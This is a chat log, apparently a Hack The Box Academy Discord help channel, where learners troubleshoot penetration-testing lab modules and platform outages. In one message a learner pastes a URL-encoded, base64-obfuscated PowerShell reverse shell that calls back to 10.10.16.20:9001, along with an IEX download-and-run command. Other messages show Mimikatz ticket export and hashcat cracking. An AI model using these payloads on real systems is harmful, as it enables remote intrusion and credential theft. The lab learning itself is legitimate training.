#modules
To be fair, the introduction to Bash does not actually cover this subject
linux fundies?
I'll feed that back to the team, see if we can improve that module
The Bash module checked through
wouldn't it fit in linux fundamentals better? it's not limited to just bash
I don't think Linux Fundamentals will have it in tbh, but am checking
It does not iirc
Nothing in Linux Fundamentals on it either, yeah
I'll feed back to the team on the Bash module to include a segment on escaping special characters like that
i can use snmp set command to launch a script on a system running an snmp agent right?
Usually snmp is just a gateway for other protocols
And it depends on the access level you have
Also you don't run commands on snmp. You just read the logs generally
yeah but you can get
and set values
typically as you say you use to just get valueeeeeees like cpu packet count etc.
but in the snmp section of footprinting module i think it asks to run a script
Nope
It asks you to read the output of a script
ah
The script itself had already run
Also you'd need to be on the manager, not the agent
well the manager would be my machine right? running the snmp get requests
Not really
You're just querying it
You can query with any device
The manager is it's own device
But often: you're not interacting with snmp as a complete foothold
You just query it for more info
i know snmp from the context of managing network devices
in order to get information like cpu load interface listings utilisation etc.
The script in question, was run and logged in the MIB
Which is where you're actually getting the info from
right so it has an oid in the tree where i can read the output
The tools showcased are only query tools
You can likely research it. But it's far beyond the scope of the course
in the end it's a simple grep on the walk
thank you
for the nudges
damn this module is dense!!!
Braa is honestly better
that's actually what i used
It outputs much nicer and more succinct
Instead of a wall of text to sift through
¯\_(ツ)_/¯
you mean you guys don't netcat and manually input characters? weak
and it assumes a default community
yeah should have been typing it in binary written my own protocol in assembly
Can anyone help me on intro to bash scripting “comparison operators” ?
looking for someone who can assist me, i am in and can share my screen. i cant find this flag in any directory
you'll have better luck simply stating what module/section/question you're on and letting us know what you've done already than asking to screen share with someone
attacking tomcat in attacking common web apps
its the last question's flag. i have a webshell but cant seem to find the flag
i don't recall where it is, but as general advice i'd recommend checking the directory you obtain your shell in (obvious), probably a directory or two before that, and then just the root directory for the drive
the tree command can also help
hello do u still need help?
Quick question guys, how do you create an aspx file?
i literally just got done with that
msfvenome
Actually better question, how do you edit the hosts file in etc? Nano isn't working and the module didnt specify a way to actually edit it
you can use vim
also in order to edit the /etc/hosts u need to run it with sudo if u havent already
sudo nano /etc/hosts or sudo vim /etc/hosts
just in case you didnt know
Thank you, and yeah I know
need help ||executing .ps1 shell after uploading PHP cmd?= shell on the XAMPP target|| - Attacking Common Services - Easy
Input a command after =, i.e. ?cmd=whoami
yes, i know, but i'm trying to upload a .ps1 shell and calling it through the php shell, my commands are : ||powershell.exe%20%5BIO.File%5D%3A%3AWriteAllBytes%28%22C%3A%5CUsers%5CPublic%5Ct.ps1%22%2C%20%5BConvert%5D%3A%3AFromBase64String%28%22cG93ZXJzaGVsbCAtbm9wIC1jICIkY2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlNvY2tldHMuVENQQ2xpZW50KCcxMC4xMC4xNi4yMCcsOTAwMSk7JHN0cmVhbSA9ICRjbGllbnQuR2V0U3RyZWFtKCk7W2J5dGVbXV0kYnl0ZXMgPSAwLi42NTUzNXwlezB9O3doaWxlKCgkaSA9ICRzdHJlYW0uUmVhZCgkYnl0ZXMsIDAsICRieXRlcy5MZW5ndGgpKSAtbmUgMCl7OyRkYXRhID0gKE5ldy1PYmplY3QgLVR5cGVOYW1lIFN5c3RlbS5UZXh0LkFTQ0lJRW5jb2RpbmcpLkdldFN0cmluZygkYnl0ZXMsMCwgJGkpOyRzZW5kYmFjayA9IChpZXggJGRhdGEgMj4mMSB8IE91dC1TdHJpbmcgKTskc2VuZGJhY2syID0gJHNlbmRiYWNrICsgJ1BTICcgKyAocHdkKS5QYXRoICsgJz4gJzskc2VuZGJ5dGUgPSAoW3RleHQuZW5jb2RpbmddOjpBU0NJSSkuR2V0Qnl0ZXMoJHNlbmRiYWNrMik7JHN0cmVhbS5Xcml0ZSgkc2VuZGJ5dGUsMCwkc2VuZGJ5dGUuTGVuZ3RoKTskc3RyZWFtLkZsdXNoKCl9OyRjbGllbnQuQ2xvc2UoKSIK%22%29%29||, and to call it i then run ||powershell.exe%20-nop%20-c%20%22IEX%20(New-Object%20Net.WebClient).DownloadString('file:///C:/Users/Public/t.ps1')%22||
You don't need to get a reverse shell
A webshell is enough
👍 thx, should what i was trying to do be possible though? im struggling to see how its not working
I'm not sure tbh. It could be getting stripped heavily
But the intended ways are ||load_file()|| and webshell
Yes, this one has 2 ways to get it
i never saw that function, what service is that in?
Reread the sql section, it's right there
thx, finally finished
hello there, can I DM you ?
👋 hello everyone. I'm trying to understand something with meterpreter and mimikatz. I'm doing the kerberos TGT module and I don't know where the files are saved when I do:
```
(Meterpreter 3)(C:\Users\Administrator) > kiwi_cmd sekurlsa::tickets /export
```
The output says:
```
MKCEAAAAAwIBAqGEAAAAITCEAAAAGxsGa3JidGd0GxFJTkxBTkVGUkVJR0hULkhU
Qg==
====================
* Saved to file [0;3e7]-2-1-40e10000-MS01$@krbtgt-INLANEFREIGHT.HTB.kirbi !
```
but there aren't any files named like this in the cwd as well as my cwd. `kiwi_cmd cd` shows the right directory I'm in and I'm administrator on windows. I googled a lot but unless I copy mimikatz onto the machine or manually copy the ticket, then I'm not sure how to make the in memory mimikatz work to export tickets automatically. I did search the entire FS locally with powershell.
Note that I can write to the dir, because I activated the mimikatz logs and it works fine. It's just the export that does not work for some reason
Note2: if I upload mimikatz, then the export works no problem. I don't know if there is a native meterpreter way
nope 😦 just tried and did not work. I also checked the manual and it does not seem to have any dir option. Also whatever I enter /e /adsfasf seem to also export. I'm thinking that's a bug
it likely means that the command defaults to saving in a specific directory
Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue -Filter "*.kirbi"
You can try using findstr as well.
yep, no luck here either
https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c#L659C13-L659C34 Im trying to see in the source code, but i'm not sure how the in-memory meterpreter behaves as opposed to a dedicated mimikatz.exe process launched by powershell
I tried to migrate to multiple processes, but no luck as well
Yeah, it's an issue.
I just read a forum. It MUST export the tickets in the current directory you are in.
Try launching mimikatz from powershell in some other directory like C -> transfer it manually.
yep that works perfectly if I run mimikatz manually, just not from meterpreter. I just tried a bunch of different things and it must be due to the fact that the extension is running in memory from another process.
thxs for the time looking into it, appreciate it a lot.
All good.
Now that I think about it.
If you run meterpreter in your /home/username/ directory
And you run mimi from the meterpreter
Wouldn't that save the tickets back to ur home directory
I wish it worked like that , 99% sure it doesn't tho.
Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
AD Skill Assessment 2.
I can't seem to get an interactive shell on the SQL01. I found the password from the file in the previous question, I suppose it's linked to the mssqlsvc account.
I used sqsh, but it doesn't work. I tried PowerUpSQL but it has no connection.
Any ideas?
mssqlclient.py gives out untrusted domain with windows-auth.
Without it, it just outputs some error in the impacket.
I’m on the shells and payloads module and I’m trying to connect to the inlanefreight.local website but it refuses to connect what am I doing wrong?
why is htb lab not spawning
The machines will spawn, they just take a minute or two to provision and be configured, patience 🙂
nope it's not on my system unfortunately, I looked there too. The command I'm running is from kiwi_cmd, not the kiwi ruby commands, I think the kiwi_cmd is passed through the little c module within meterpreter which should be executed in the context of the windows process. I'm thinking that the meterpreter kiwi wrapper will interface between the underlying kiwi_cmd command and the local reverse tcp session
OOf
@sleek moss refreshing the page won't make any difference either I'm afraid. Your browser will receive a notification once the machine is available. Hopefully by now you have your target @sleek moss ?
i do danke
Nice, glad to hear it
forend::INLANEFREIGHT:846f684f9cdac33d…
i used hashcat -m 5600 and it didnt crack even with the rockyou wordlist which was said on the module, it said it exhausted the list
└─$ hashcat -m 5600 -a 0 crack /usr/share/wordlists/rockyou.txt
Hey guys, I am curious about an issue I ran into while in the Intro To Assembly Module, I'm at a part that concerns pwntools, I am trying to use gdb to debug an elf file that was made using the pwntools function ELF.from_bytes(unhex(<shellcode>)).save(<filename>). The issue being, gdb debug the file for some reason. Was wondering if anyone else came across this issue.
Module: Active Directory Trust Attacks
Section: Unconstrained Delegation
Link: https://academy.hackthebox.com/module/253/section/2803
Question: Abuse Unconstrained Delegation to get the TGT of DC01$ and submit the flag located at \DC01\UCD_flag\flag.txt.
I have run a dcsync attack against the krbtgt account. Obtained the hash and created the golden ticket. I am unable to access DC01. I keep getting permission denied.
Please help. Thank You.
You're going to need to say which module / section, that username is used a lot
Use windows auth
wrong account
gotcha, thanks.. i always forget to try reusing 🙂
now you're making me look like a crazy person
Is it faster to brute force pop instead of IMAP or roughly the same?
Roughly the same
As bruteforcing is just attempting to login
Though usually you should have a username to attempt with
theres only ssh/pop/imap on this, and i cant user enum any of them i think
its 8.2p1 so not vuln to ssh-user-enum (i believe)
i figured the only thing i can do is brute it
no emails or anything from nc / openssl banner grabbing
Never brute ssh unless forced
im bruting imap
What section/module?
hard footprinting
Oh. There's definitely more open iirc
ill do another scan 👍
Try scanning udp
ah shit yeah i ignore that on htb since it takes so long.. can probably guess which port is open now you said that
lol was right
Also read the brief for it: it might enlighten you as to what to look for lol
mx / management server / backup server mehhhh not sure. tbh i have very little ||snmp|| experience in production, it simply isnt used at the places ive worked
so it wouldnt be something i check. but im definitely gonna put it up there now
Keywords
do management servers usually handle ||snmp||?
Yes
what is a 'management server' lol
simple network management protocol
Basically like update servers
I.e. a staged server
ah right, yeah the only thing i know that has snmp are UPS units
ill have to look up some examples
great for monitoring when you can't shove some kind of agent on the device
i assume u just whip it in promtail and feed it to prometheus or logstash?
also im in 😎
It's honestly fairly straightforward
Like 1000% easier than the easy lab 
honestly easy took me no time at all
idk i did the relevant modules this week so its all so fresh i kinda knew whats up 😄
Nah. It's not even that
Common consensus is that the lab difficulty is out of order
they all seem quite easy though, maybe med on the hard one because it requires more enumeration than usual but its basically ||'find open port -> it has password -> use it on the other port -> you are in'||
which i guess is how it works in real life 🤣
I mean yeah, if there's low security posture
Attacking common services - hard
hint states that there should be ||2 users capable of impersonating, yet theres only 1 session?||
im questioning if its the other ||impersonation|| route but i just wanted to make sure before i try b/c the rdp is insanely slow
your current way is wrong
it also doens't require rdp 😉
ty... rdp is taking 5+ seconds to register input..
Is someone available to help with the footprinting imap/pop3s module?
i literally just finished it what you need 😄
Mind if i dm?
np
i can also help 🙂
curious to know if i completed attacking common services HARD properly, my route after obtaining ||fiona|| credentials was ||mssql, impersonate as john, execute the OPENROWSET to view flag.txt file over the linked sql service.|| im not too sure if i did it properly b/c i never used ||julio|| or ||patric||'s credentials nor did i have to RDP
hello guys,
pivot module - Remote/Reverse Port Forwarding with SSH
i completed this section but understand little, maybe you can tell me 🙂
Wouldn't it be worrying if that's what she said to me?
What about it did you find confusing?
yes little
I don't understand why I should get a reverse connection on a machine I have access to, I already know the information about the machine.
did you have remote command execution before?
no
well now you do
having rce on a machine makes what you can do on it almost limitless
you can obtain the id_rsa key to ssh in with no password, set up users, privilege escalation to make yourself root, access almost anything
you can also obtain the flags hidden on the computer for ctf's and the modules
The section shows you how you can create a route back to you. If you wanted to capture an escalated reverse shell, you can catch that on your host instead of the foothold. You're only limited by your imagination after that. Forward SMB requests, quickly transfer a file further into the network, etc.
what is the problem?
Hi I am stuck in attacking thick applications in attacking common applications.
I am facing compilation error in fatty
can someone help me debug it please
been stuck at it for weeks
The password is the problem. Put the password in single quotes 'HTB_@cademy...'
Have you watched the ippsec video on fatty?
yea but I cannot compile it even after following the steps word for word
when i try ippsec's method with creating a project with the fatty jar as a reference library I get a bunch of syntax errors even after using java 1.8
I'm confused between ejpt, eWPTX and eWPT.
Which course should I take? I have no professional experience, which one will be better for a job??
Like I think (correct me if I'm wrong) ejpt is a bit easy so is it okay to jump for eWPTX or eWPTX?
I try to use socat on windows but I get an
.\socat.exe TCP-LISTEN:8000,fork TCP:127.0.0.1:1337
2024/04/25 02:48:36 socat[16964] E connect(5, AF=2 127.0.0.1:1337, 16): Connection refused
If you want to bypass the HR filter, then you probably need OSCP
If it's about gaining good knowledge, then CPTS is probably right for you
I double checked resource monitor and there was no service blocking 1337 or 8000
Ik oscp would be great but it's too costly
any idea what should I do?
Take a look at the job advertisements. Then you will see which certificates you need to bring
If I had to venture a guess, it seems like you're skipping a step or two
I tried following the module
decompile the jar file using jdgui > remove the rsa and 2.sf files > remove the hashes from MANIFEST.MF > change the port from 8000 to 1337> compile using jar -cmf ./META-INF/MANIFEST.MF ../new-fatty.jar *
I run the jar with java -jar new-fatty.jar get the error cannot find file htb.....Starter
I double checked the MANIFEST file there was no wrong path
here is my modified jar
I'm not sure why you are trying to run socat
the powershell is on admin
if you complete cpts then the oscp will be easy. cpts is harder and more advanced so you would only have to take the oscp once
I want to forward my 8000 port to 1337 to try ippsec's method
I set the hosts file to 127.0.0.1 fatty.server.htb
Ik I was about to take cpts but it's costly too that's why I'm going with ine certs
any advice how to approach?
I just went through the steps to where it shows you the login successful part (yes i didn't take notes, sue me) on the VM HTB provides for the section
only steps you need to take are to extract the files, edit the port, manifest.mf, and delete the two files and jar it back up. As explained in the section, make sure your manifest.mf has a new line.
yes I did follow the steps exactly
here
and make sure you have a new line in your manifest.mf
I had 2 new lines
let me make it to one and then try
```
Manifest-Version: 1.0
Archiver-Version: Plexus Archiver
Built-By: root
Sealed: True
Created-By: Apache Maven 3.3.9
Build-Jdk: 1.8.0_232
Main-Class: htb.fatty.client.run.Starter
```
I did what I explained on the host itself as a means to reduce any complexities, maybe you should as well.
yes I tried to do it on the foothold and pwnbox too and got the same results
this powershell is from the foothold
Mind if I DM you?
sure
WINDOWS PRIVILEGE ESCALATION this module is a pain...so much lagging...
nice
Who is solved skill ass injection attacks
Usually you would import a .ps1 and invoke it on some way
It also helps to say what module you're working on
And what section
Hello guys
i added the ip with sudo nano /etc/hosts but i don't know why firefox is not opening the ip address even though i'm connected to the vpn
If you're doing a box, then it autoredirects to boxname.htb
And if it's not in your hosts file, it doesn't resolve
I need a help to know the name of the first section of Intro to Academy
I've tried many times with incorrect answer
i personally use this command(its quite long but i have it saved and just copy paste it)
echo "ip_address domain" | sudo tee -a /etc/hosts
Figure out what a section is, they do tell you it in the reading
Modules are broken down into sections, that is your only hint
I read everything carefully but every answer I put in come as incorrect
Then you're not understanding what a section is
Each section is a page in the module
Look at the Table of Contents
HI
HI
hello guys,
i dont understand this question
pivot module - Meterpreter Tunneling & Port Forwarding
last question
Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x)
has anyone done the skill assessment for intro to whitebox pentesting?
Hi did you find the answer?
yoo everyone
Yes, currently 88 people have completed this module
hmm know where to go for tips? lol
not working
this working on the thm
anyone using vencord?
Well this isn't thm
Joe
should i tell my steps what i am doing
What module are you doing, and what's your /etc/hosts. If it's a box on app.hackthebox.com then move this to #boxes [read #welcome to access it]
on the hack the box
And you'll have access to #boxes
This channel is for help with academy modules https://academy.hackthebox.com
@fleet birch I don't do random dms
sorry
examine the traffic to and from IP addresses. look for any patterns or telltale signs of C2 activity. you can follow the trail and arrive at the points of origin
😄 thx finished
Don't @ me again. Always read the section again if you get stuck
I believe the example and everything even points out what it wants
The answer key gives you the format it wants. And looking at the output of autoroute would have made it clearer
adding route to subnet/netmask
Anyone able to assist on the skill assessment for intro to whitebox pentesting?
Just ask your question here
so i'm looking through the code, and i've come down to the conclusion that the vulnerable function must be the ||ping api route||. It's the only route that seems to do more conditional checks and also has ||eval()|| inside. i've been able to successfully send a payload that will ping an IP of my choosing, but seems I'm unable to breakout. The execFile() tells me it can only do a single command at a time, so adding code behind my ip will ||ping the ip|| but everything else fails. I thought maybe I could set the uip and add javascript code injection there, but everything i've tried with that fails too
cant tell if im in a rabbithole or not lol
You are on the right track.
Make sure that your payload does not break either the ||JSON|| or the ||Javascript||
are vm's bugging? cant spawn the machine for 'attacking common services-smb'
Is there a way for us to look that up or is it a mod thing?
Anyone who has completed the module can see how often the badge has been issued
Where?
Can I check if anyone is facing issues with spawning target?
I have been trying to spawn target not working either
Jopp same here
Does anyone has any tips?
I don't see it, that only shows my badges and doesn't show info about how many people have them
Open the shareable link
and then?
oh i see
you have to share the link, then go to the shared link
thanks. kinda weird it doesn't just show it when you click on the icon or something
Anyone know why HTB main website is super, super slow?
On HTBLabs
Is it because of maintenance? I don't know exactly what time it is meant to happen, like start/finish? I'm unsure
yes its super slow for me too no targets are working for me
I am also not able to spawn any targets to work on the HTB Labs
I relate; same :L
I guess I'll go to PortSwigger or THM for a little
Has to be the maintenance it was talking about
I have a question for all of you out there is there someone sitting in SWE and want to have a study group or something like that ??? iam sitting with the pentesterpath at the moment 65 % through so if someone wants to study together hit me up !!! 🙂
I would bro but I'm on CBBH path haha; I'm a noob
also struggling to spawn a target in the Footprinting module
well iam a noob too 🙂
Hello guys, i'm trying to do a module, but when i'm trying to spawn the target, i have "Target is spawning" but nothing happens
nothing is working at the moment
Hello does anyone know if you can spawn a lab again after completing it?
I'll add you fam
I got no idea; is there a reset button for it?
yes you can
Thanks! I thought you couldn't as my machine won't spawn but seems like it's happening to other people too
just now i started a machine and it worked, maybe it's back up
/module/19/section/102 The target cannot be spawned. Is this known?
I see, well +1 for this issue.
hi guys please i need help trying to connect to ssh root using id_rsa but i got an error in libcrypto, how do i solve this
is the ssh server configured to allow root login?
normally sshd has norootlogin set
there's a lot of things , first is the key of the root user ? did you give the right permission to the key ? is the root user allowed to login ?
maybe provide the command u use and the error u get
also run your ssh command with -vvv for max info
yes it logs in but asks to enter a password, and yes i gave it chmod 600
asking for password that means the key is not correct
sudo ssh root@ip -p xxxx -i id_rsa
or make sure the permission are set
which module ?
-p is for port
privilege escalation getting started module
command looks right
what is the error?
and run with -vvv
it will give u more info
idr using ssh keys in this
Load Key "id_rsa": error in libcrypto, then it asks to enter the root password
ok so it isn't finding the id_rsa key file or the key file is not correct
do you have a file on your machine called id_rsa
yes i copy it and use nano to create
also it would have to be on the server in the user's .ssh/authorized_keys file
use nano to create what?
wait wait , tell us what have you done from the first
yes am connected to vpn on my linux
try to run an ssh server on your machine and login to the ssh server
no no you will make him lost
you can ssh locally and provide the path to the id_rsa
or you can base64 encode the key and decode it on your box
this id_rsa you generate it right ?
he should do it on his machine. This will help him understand how an ssh key login works
locally or remotely, it's still logging in with a key
i login user1 cd to user2 got the flag, then cat root/.ssh/id_rsa
yes but if he does it on his machine
he will understand that .ssh/authorized_keys needs to have the public key of the user
and you find the id_rsa
and that ssh-keygen is needed to gen the keys
right ?
etc. and thus what he's trying to do on the remote box will make more sense
iirc sshkeygen is out of scope for that module
it just sounds like they had an issue with copying the id_rsa
yess exactly
you guys are awesome thank you all i will keep trying to figure it out
maybe check the md5sum of the id_rsa
yes i will try all you guys said got all night
if you want to ensure that you get no errors, you can cat the contents of the key and base64 encode it
then copy the base64 string and decode it on your own box and output it to a file
alright doing that
Hi guys! I would like to ask for help on the Brute Forcing Passwords on the Broken Auth module.
Using rockyou-50.txt as password wordlist and htbuser as the username, find the policy and filter out strings that don't respect it. What is the valid password for the htbuser account?
||I have used this to filter out rockyou-50.txt: grep '[[:upper:]]' rockyou-50.txt | grep '[[:lower:]]' | grep '[[:digit:]]' |grep -E '^.{3,}$'||
||I was only able to identify 5 passwords based on the above filter, and none of them worked.||
A little bit of nudge/hint is much appreciated.
Does anyone know why I would get this error
```
At C:\Users\user\PowerView.ps1:20882 char:43
+ Set-Alias Get-NetOU Get-DomainOU#requires -version 2
+ ~~~~~~~~
+ CategoryInfo : InvalidArgument: (:) [Set-Alias], ParameterBindingException
+ FullyQualifiedErrorId : NamedParameterNotFound,Microsoft.PowerShell.Commands.SetAliasCommand
```
When trying to Import-Module PowerView.ps1, but then running the command again imports it and makes it work? Why does loading it twice work and loading it once doesn't?
Hey I was thinking to go for cbbh cert I have 2 questions:- 1. How long is the duration like how long I the time period under which we have to prepare
2. Everything's going to be in the text format or will it include videos too??
look at the line causing the problem ig
Yeah but then it just works without modification again?
finally got the command injection.. its weird because i've tried this syntax over a dozen times i guess...
MODULE: Whitebox Attacks
SECTION: Client-side Prototype Pollution
I'm really struggling with manifesting the attack chain in the exercise. After examining the /admin.php page contents, I thought that I was meant to forcefully have the victim promote my account, but my payload(s) haven't worked. Am I in the right ballpark?
Yes, you are on the right track.
||Search for client-side-prototype-pollution on Github.||
.
I am stuck in the "unconditional branching" section of the Intro to Assembly language... the questions is: Try to jump to "func" before "loop loop". What is the hex value of "rbx" at the end?
I tried many things but all answers I get are wrong... for me the loop will never happen since I need to jump...
Hi guys, I have an issue that sometimes occurs when I restart my instance. After restarting, it stops working with this error: 'Error: Something went wrong while generating your VPN Key. If this persists, please contact support.' Maybe this is a well-known error. What should I do? ( ping me )
have you tried contacting support? lol
i think there is a problem on htb end, in #cpts someone else is having trouble with vpn connection, and i too have the same problem
can I dm you?
sure!
okay ty
anyone in trouble to spawn targets??
Yeah can't spawn target nor connect to the vpn, seems to be on htb end, people having the same problem in #cpts
now my target spawned, i connected in vpn, but i can't access the target via xfreerdp, lol
the same for me
Im doing the shells and payloads and im on the last question on infiltrating windows, can someone help me?
Where you stuck?
I cant get a shell in metasploit and ive done it like the module has shown
Be sure that you're setting the rhosts and lhost correctly
Well hard to help with only that. Usually just retype or restart the machine. If you got the correct metasploit exploit you just need to change the LHOST and RHOSTS.
Its smart to type options at the end again to see if you misspelled RHOSTS for example
Thanks ill try again
Hi, could anyone please check if the Target spawns in this module? https://academy.hackthebox.com/module/134/section/1204
Other modules seem to work fine, except this one.
That's the reply i've got from the server:
{"success":1,"ready":0,"ip":null,"life_remaining":119,"remaining_life_in_seconds":7193}
Anybody else having problems spawning targets ?
got the same problem while on my cdsa exam
Same here. Seems to be a known issue: https://status.hackthebox.com/incidents/f2c5871f-f546-461d-aa82-9d3bc75e752a
Someone is having problems with Target is spawning...?
yeah
It keeps loading and does not start the labs. 😦
i think everyone
aa okey
it's EU issue it seems, I changed my vpn and pwnbox to US East and it works now
i can connect im my vpn, but i can't spawn target
like me, what I can't do is spawn the lab.
eu doesn’t work. us west doesn’t work either.
lol
here too
yes
But does it work with the EU VPN?
it only worked for me with the US ones, but it did work briefly with the EU a couple of hours ago
I'm still having issues with EU
Try changing to US
Yep, that works
Thanks ^^
.
I can't start any targets. Someone else with same problems?
Yep same problem here
Sometimes it can take a few minutes, but if you're on EU, switch to US
if you're in EU it's past your bedtime
Had same issues, switch to US
EU servers are currently having problems
how? I can only switch VPN to us but targets?
Targets will spawn on the US vpn
i see
Strange because i try to spawn them and not working
Vpn dictates the spawn point for targets. You'll obviously need to dl a new vpn pack to connect on your own vm
Yep i switched to US and it worked
Yes i switched to 3 also
Is it just me or is the Academy glitching
course progress green checks are gone, and cube graphics
and I get errors when I click mark and complete
Anyone within the CSDA path that can help with question 1 in "Snort Rule Development". Looking for the content word that would trigger an alert based on a log4j pcap file. I've basically pinpointed it down to a couple lines but I've no idea what the keyword would even look like as they all look similar.
Sometimes refreshing helps
nah, its me too
¯\_(ツ)_/¯
@west rampart idk who to tell but something got fucked up in the scademy and the ticks next to the sections dont show
academy*
Refreshed, logged in and out, likely an update to the site bug
Message support to report the issue ig
frfr
¯\_(ツ)_/¯
did already
michikat dont answer
He might just have discord client open
Also don't ping staff a bunch 
worth a try
Well, I mean when it comes to the operation of the Academy, I do not think they would mind being pinged as it is a revenue generator for them 🤷♂️
The support chat exists to report issues
Multiple avenues to report issues are available, I am not sure why you are pushing back on any of it other than to be contrarian. We are trying to solve an issue.
engineers are already aware of the EU vpn issues so they can also work on other issues ¯\_(ツ)_/¯
You do not need an engineer to modify the academy interface, it is a web design bug
Discord generally isn't the best way to report issues as it can take an unknown amount of time before it's seen by the intended recipient
No harm in trying all avenues
I don't think a ping to staff member is needed for a visual bug
As long as it's still recording as completed, it's fine
If it's not recording as completed then it's an issue
Can you submit flags and move to next section?
Move yes, but receive errors and no completion
Mark complete and next works fine for me
I am about to finish a module, so we shall see
But nothing is marked completed for me yet
How should the response to this question be: There is a file named wannamine.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to the Overpass-the-hash technique involving Kerberos encryption type downgrading. Replace XX with the appropriate value in the last content keyword of the rule with sid XXXXXXX within the local.rules file so that an alert is triggered as your answer. Is the answer supposed to be the byte XX?
Can't test with flags since I don't have a spare one lying somewhere
So it's accepting your answers
I am not a moron folks lol
We weren't saying you are?
is it me or are the exercise spawned machines a bit flaky sometimes
actually i think it's the vpn
it doesn't deal well with long periods being connected
If you're using EU, switch to US
There are problems with EU vpn
https://status.hackthebox.com/incidents/f2c5871f-f546-461d-aa82-9d3bc75e752a
you replace the XX with the byte
ok thx
i had done that
but I think more generally I find that the openvpn connection gets out of sync or has other issues
I usually prefer that over spawned machines, but yes I have noticed sometimes it's slow
when i say spawned machines i meant spawned targets. I never use the pwnbox web machine
sharing this here, for whoever is doing the Password Attack module, section Pass the Ticket on Linux. One of the questions is referring to cracking the keytab file for the svc_**** user from a user we already cracked the keytab. The keytab ticket I'm referring to only has the aes-256-cts-sha1 identity in it and according to the example, you are supposed to use the one with the NTLM instead. However, I was interested in finding if it was possible to crack and it is with: hashcat -m 28900 -a 0 '$krb5db$18$<username>$<domain>$<aes-256-cts-sha1>' <wordlist> This is referenced in: https://www.iana.org/assignments/kerberos-parameters/kerberos-parameters.xhtml to get the encryption type 18 (like it says in the github project the module recommends) and then this page https://hashcat.net/wiki/doku.php?id=example_hashes is a good resource to have anyway. I don't know if people went the same route or they did not bother and skipped this. One thing to note is that ntlm is WAY faster to crack than aes-256-cts-sha1 lol
Because this method is way more complicated when NTLM is like... right there
for sure! I just wanted to find a way in case it will not be right there in a future case
But is this byte the response format?
For some reason, I finished the "JavaScript Obfuscation" module but it takes me to the details module page and still shows I have some left to finish. Not sure how this happened? I answered all the questions and clicked the "Finish" but on the final page. It's just not showing completed?
Visual bug on the site currently
yes, enter the byte as the answer
Also make sure on each page you click "mark complete and next"
Thanks @fathom pendant I went back through whole module and forgot one question. So finished now. 😆
@remote latch if you are facing issues, please open a support ticket
We are all having issues with Academy currently, progress and visual bugs.
Please open a ticket then
I finished a module, it's only a visual bug, once you click on "Mark complete & Next" it is registered as completed
Perfect
Okay, thanks for the tip. 🙂
that's not personal, that's global cuz several people have such a glitch, meaning it's probably everyone
Ticket is still the way to go
its just that the side icons for completing stuff and other are gone
thats quite literally the issue
considering its other too, its some sort of bug with the website/css
or the image
Hmm, I see the issue I think
what is it(yes im very interested in it)
There's an issue loading the FontAwesome assets it seems
^_^
Yeah
No, g0blin is just my nickname 🙂
Hi, I just started with academy and when I complete a machine in the academy module it doesn't appear on htb labs as pwned. Was wondering how you go about it? Whether you just paste the flags there as well or leave it for later to solve one more time?
They are separate platforms
Academy and Labs aren't linked with boxes
If you're referring to the "Getting Started" Nibbles example it will not reflect
You'd have to go pwn the retired machine on the labs site
And the flags will be different
oh okay thats clear now. thank you!
This should be resolved now @remote latch
It is for me
Great
I am currently working on a module available at "https://academy.hackthebox.com/module/24/section/160" and I am struggling to answer the second question. The hashes generated by 'hasher' and 'md5sum' are very similar, except that hasher's hash is in lowercase and md5sum's hash is in uppercase. I have tried other hashing tools, but I am still getting the same hash values as hasher's/md5sum's. However, I am unable to submit a valid answer.
Did you unzip the file? The hash starts f45 and ends b9d
hmm, that's not what I'm getting
ye, I did unzip but my hash starts '788' and ends as '92a'
I am deciding between silver and gold and they both say "Step-by-step module solutions". What is this and where is this? I have been through several modules and have not seen step-by-step solutions. There are some modules where you have to duplicate what you see in the reading and type DONE but not all are like that.
I'm getting 32 chars exactly and there are no extra spaces included
Those arent plans for academy are they?
Lab.htb and academy.htb have different sub plans
This is for academy
The plans on Academy do include that term as a perk "step by step module solutions".. honestly not sure on how they are provided, or at what point (e.g. do you need to complete the module first)?
Oh shoot my bad then. I never saw it
I literally just did it and it works just fine for me
It's a new feature of the annual subscribers. You need to enable it in settings once you are subscribed
I was gonna test this out soon.tm
This is what I am talking about:
It's literally a brand new feature so it hasn't been around long enough to have any proper feedback
I've had time to nap so I can have a more cohesive thought process regarding it. Imo if it's just a literal step-by-step guide without first having some minor gateway in place, i.e. failing a question multiple times like the discord help feature, is a detriment
But it is a step between people just asking for videos
@pale stirrup in your linux machine, what is the md5sum of the upload_win.zip
Also the upload_win.txt that exists already on the desktop is NOT gonna give you the right hash
thank you
@ocean night ur a top G

Turned out it was an outage with FontAwesome
It resolved minutes after I upgraded our plan 
||2EDF25B27B268445694276C20D55449E|| is the md5sum of the zip file (casing doesn't matter, you can check this with Get-FileHash <filepath> -Algorithm md5) @pale stirrup
"Give us more money"
If you wanna dm me about it feel free @pale stirrup but I can confirm that uploading, unzipping and getting the filehash with hasher does work and give the intended answer
what something new on academy ?
The only way to obtain a 'valid' hash is by using the hasher application on the target machine. That's what confused me initially. Attempting to hash the upload_win.txt file with a command such as 'Get-FileHash PATH\upload_win.txt -Algorithm md5' will produce a different output.
Annual sub holders have a "show step-by-step walk through" option
what that's mean they got walkthroughs ?
Basically, yeah
weird
walkthroughs for what though? the skill assessments?
the modules themselves are walkthroughs heh
Everything

Just took a look at the guide for ad enum and attack skill assessment 2, as I'm looking to provide accurate and thorough feedback on it
why not working my command?
where is the guide located?
If you're subscribed to the annual, there is a link for each assessment question.
Not for the exams of course though 😅
e.g.
If you're subbed, you need to enable the option in your settings (https://academy.hackthebox.com/settings)

can powerview.ps1 only export csv?
I'm doing the Attacking Common Applications, attacking splunk. I don't understand how the payload they gave us for powershell we have to name it run.ps1 and it'll run and give us a rev shell, but if we name it something else like shell.ps1 it won't run it
because linked names and such
so then i have to name it run.ps1 everytime if i want to run it
hello guys,
I get this error while installing the dll file
pivot module - RDP and SOCKS Tunneling with SocksOverRDP
Disable real-time protection
Damn so basically when u purchase a module u haven’t purchased it 100% 😄
Anybody have a workaround for the issue with the XSS Phishing section?
The >!-- does not work
Just shows part of the payload
I posted in erratum but I was wondering if anyone has a workaround for now until it's fixed
